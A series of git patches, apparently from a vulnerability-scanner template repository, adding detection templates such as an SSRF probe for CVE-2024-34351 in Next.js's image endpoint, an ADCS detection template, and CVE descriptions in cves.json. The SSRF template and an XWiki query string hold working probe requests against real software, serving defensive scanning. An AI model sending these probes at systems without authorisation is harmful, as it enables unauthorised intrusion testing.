--- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 43c260e7807..323947697d9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -974,7 +974,7 @@ http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8 http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778 http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757 http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035 -http/cnvd/2021/CNVD-2021-15824.yaml:f2c942015bfe6963cf4bc852a8ef223241838ddd +http/cnvd/2021/CNVD-2021-15824.yaml:ff1b26509369cd7c5faf50b125a4e909cbb789af http/cnvd/2021/CNVD-2021-17369.yaml:c6641a046b08f57aa90ed4aca983da8265404f8c http/cnvd/2021/CNVD-2021-26422.yaml:3e323f0417f5e29dde9543fbb5ecbfe4dbcc6303 http/cnvd/2021/CNVD-2021-28277.yaml:68aff5e8d0140815c4acfff946b3f46f69f184b2 @@ -3115,7 +3115,7 @@ http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 http/cves/2023/CVE-2023-28662.yaml:db8a8150ddf3eeb5658b6a1f890fbda8f0904d59 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a -http/cves/2023/CVE-2023-29204.yaml:c8e21ff3c03734685069d76093b69a2ae414d7a7 +http/cves/2023/CVE-2023-29204.yaml:4f9c361d223ff2788c57b39f5dce6b76a910fb31 http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 http/cves/2023/CVE-2023-29300.yaml:92d57be27eb447fc6bd0912c30df002d7407a300 http/cves/2023/CVE-2023-29357.yaml:0ab57ac3d6597a932b316bc1dfdb6dded4854294 @@ -3396,6 +3396,7 @@ http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f +http/cves/2024/CVE-2024-1512.yaml:a5e1b8a041561e640567b787b0095424891fe3c5 http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a @@ -8877,7 +8878,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8c32bfa7093ffc5a2a4b1f2d90e7c99d6de8e47 +templates-checksum.txt:de2dca21800a028e9e567e3d63a3a1a9ad19bd59 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 559a48970b4bff8bf167dea27d6d8ee3ffda8c41 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 08:37:00 +0000 Subject: [PATCH 173/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 58a67fbf9be..f4779767c5b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' + - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' From f81354cb2125a05aeb9ebea00a05da622ba28b94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 08:37:59 +0000 Subject: [PATCH 174/247] Auto Template Signing [Mon Jul 15 08:37:59 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1512.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index 5be76b06ec1..db788014567 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -42,3 +42,4 @@ http: - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100c6dbdabebf3324ee1e4f9d45c2950a0ce5014cdfc534dea737e3a9ff0b443dbd022100a8d3ef776d11c757f11fa7ac51275fada26d7035c89eb55fe944b9a7f653843a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d4415866ae6aa55f2dadf2af3980d6b9ce93e09f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 15 Jul 2024 10:52:14 +0200 Subject: [PATCH 175/247] Add files via upload --- http/cves/2024/CVE-2024-34351.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34351.yaml diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml new file mode 100644 index 00000000000..b7459413486 --- /dev/null +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -0,0 +1,28 @@ +id: CVE-2024-34351 + +info: + name: Next.js - SSRF + author: righettod + severity: high + remediation: Upgrade to Next.js version 14.1.1 or higher. + description: | + Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF. + reference: + - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps + - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 + - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + metadata: + max-request: 2 + tags: cve,cve2024,vercel,nextjs,ssrf + +http: + - method: GET + path: + - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}' + - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - 'http' From 167255cda90fcf490dc73b543117d572e3747c8a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 15 Jul 2024 10:58:10 +0200 Subject: [PATCH 176/247] Remove extra spaces --- http/cves/2024/CVE-2024-34351.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index b7459413486..b2f5ef23bca 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -10,7 +10,7 @@ info: reference: - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 - - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g metadata: max-request: 2 tags: cve,cve2024,vercel,nextjs,ssrf From c8a20d1aae4d4b75bb55831686f6f01043f07b0e Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 15 Jul 2024 11:01:16 +0200 Subject: [PATCH 177/247] Fix linter error --- http/cves/2024/CVE-2024-34351.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index b2f5ef23bca..23bbe1b96ac 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -22,7 +22,7 @@ http: - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' matchers: - - type: word - part: interactsh_protocol - words: - - 'http' + - type: word + part: interactsh_protocol + words: + - 'http' From 8a3ad71ea40b4fcc5ccd2f10fbbf697f8465d794 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 14:41:14 +0530 Subject: [PATCH 178/247] minorupdate --- adcs-detect.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/adcs-detect.yaml b/adcs-detect.yaml index 4705dc4f92c..f60a3d3b8c2 100644 --- a/adcs-detect.yaml +++ b/adcs-detect.yaml @@ -1,10 +1,11 @@ id: adcs-detect info: - name: ADCS Detection + name: ADCS - Detect author: pastaga,defte severity: info - description: ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` + description: | + ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` tags: ad,adcs http: @@ -12,17 +13,16 @@ http: path: - "{{BaseURL}}/certenroll" - redirects: true matchers-condition: and matchers: + - type: word + part: header + words: + - "Location: {{BaseURL}}/certenroll/" + - type: status status: - 300 - 301 - 302 condition: or - - - type: word - words: - - "Location: {{BaseURL}}/certenroll/" - part: header From 135211d87338554b7951b3ebdc35aaddf042208c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 14:44:21 +0530 Subject: [PATCH 179/247] fix trail space --- adcs-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/adcs-detect.yaml b/adcs-detect.yaml index f60a3d3b8c2..c23078450b6 100644 --- a/adcs-detect.yaml +++ b/adcs-detect.yaml @@ -4,7 +4,7 @@ info: name: ADCS - Detect author: pastaga,defte severity: info - description: | + description: | ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` tags: ad,adcs From 489eae8e9b0da269856a877e60c8a2b40bfa0a58 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 11:18:24 +0000 Subject: [PATCH 180/247] Auto Generated New Template Addition List [Mon Jul 15 11:18:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dcbd671beaa..922d7f8f5cf 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml +http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml From 666dba119751815ad8f1fbdb4e6c3c13df67a73f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 11:18:29 +0000 Subject: [PATCH 181/247] Auto Generated Templates Checksum [Mon Jul 15 11:18:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 323947697d9..edb768bc9c9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,6 +3293,7 @@ http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf +http/cves/2023/CVE-2023-4450.yaml:44a7cf49f0f3248d174146ef6363d5d280737948 http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 @@ -3396,7 +3397,7 @@ http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f -http/cves/2024/CVE-2024-1512.yaml:a5e1b8a041561e640567b787b0095424891fe3c5 +http/cves/2024/CVE-2024-1512.yaml:aa9ecb446e1abbc03acec48e489c0a4aa5b3c053 http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a @@ -8878,7 +8879,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:de2dca21800a028e9e567e3d63a3a1a9ad19bd59 +templates-checksum.txt:6541ef1d68f6051c35d1edb80eeeed45cc1bfdc0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2c6a6bc88baef89fc8a851b8d868a54f2d74c997 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 11:18:30 +0000 Subject: [PATCH 182/247] Auto Generated cves.json [Mon Jul 15 11:18:30 UTC 2024] :robot: --- cves.json | 4 ++++ cves.json-checksum.txt | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 48b0e65d86c..6b513c36b5a 100644 --- a/cves.json +++ b/cves.json @@ -2103,6 +2103,7 @@ {"ID":"CVE-2023-28662","Info":{"Name":"Wordpress Gift Cards \u003c= 4.3.1 - SQL Injection","Severity":"critical","Description":"The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version \u003c= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28662.yaml"} {"ID":"CVE-2023-28665","Info":{"Name":"Woo Bulk Price Update \u003c2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The Woo Bulk Price Update WordPress plugin, in versions \u003c 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-28665.yaml"} {"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"} +{"ID":"CVE-2023-29204","Info":{"Name":"XWiki - Open Redirect","Severity":"medium","Description":"XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29204.yaml"} {"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"} {"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"} {"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"} @@ -2280,6 +2281,7 @@ {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} +{"ID":"CVE-2023-4450","Info":{"Name":"JeecgBoot JimuReport - Template injection","Severity":"critical","Description":"A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4450.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} {"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} @@ -2311,6 +2313,7 @@ {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} {"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} {"ID":"CVE-2023-48241","Info":{"Name":"XWiki \u003c 4.10.15 - Information Disclosure","Severity":"high","Description":"The Solr-based search suggestion provider that also duplicates as generic JavaScript API for search results in XWiki exposes the content of all documents of all wikis to anybody who has access to it, by default it is public. This exposes all information stored in the wiki (but not some protected information like password hashes). While there is a right check normally, the right check can be circumvented by explicitly requesting fields from Solr that don't include the data for the right check. This can be reproduced by opening \u003cxwiki-server\u003e/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain\u0026media=json\u0026nb=1000\u0026query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__\u0026input=+ where \u003cxwiki-server\u003e is the URL of the XWiki installation. If this displays any results, the wiki is vulnerable.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-48241.yaml"} +{"ID":"CVE-2023-48728","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"A reflected XSS vulnerability exists in the functiongetOpenGraph videoName functionality of WWBN AVideo 11.6 and dev master commit 3c6bb3ff, allowing arbitrary Javascript execution.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-48728.yaml"} {"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} @@ -2382,6 +2385,7 @@ {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} {"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"} +{"ID":"CVE-2024-1512","Info":{"Name":"MasterStudy LMS WordPress Plugin \u003c= 3.2.5 - SQL Injection","Severity":"critical","Description":"The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1512.yaml"} {"ID":"CVE-2024-1561","Info":{"Name":"Gradio 4.3-4.12 - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 9fc4b47fbcc..bc5f3318a99 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -58f28adddb059a43b0d499b154186d90 +851cf7ffd87eb1993861c3b1212f2cc1 From eb3dfe9dadceafb1e3c3276ca29298dfa54785bc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 11:19:17 +0000 Subject: [PATCH 183/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f4779767c5b..3b1b1400d80 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' + - 'http/cves/2023/CVE-2023-4450.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' From d28415978c70dd0dca647db8d859fef7171824f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 11:20:14 +0000 Subject: [PATCH 184/247] Auto Template Signing [Mon Jul 15 11:20:14 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4450.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index bd903ecbb7d..9ab83dd2436 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -49,3 +49,4 @@ http: - 'contains(content_type,"application/json")' - 'contains(body,"success")' condition: and +# digest: 4a0a004730450220135a9c5fa1c023dc55fe5eb17706449db2ea049b85cba660a61443ddea7479a3022100ddc514634d1076ee8fa7a54a93604c5c3ea9fe824c53cba4acc708c0e1550d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c137f3ceefb05c95a16e6f57a7d44f86503cd754 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:36:50 +0530 Subject: [PATCH 185/247] minor-update --- http/cves/2024/CVE-2024-34351.yaml | 25 +++++++++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index 23bbe1b96ac..b0bc3df145d 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ 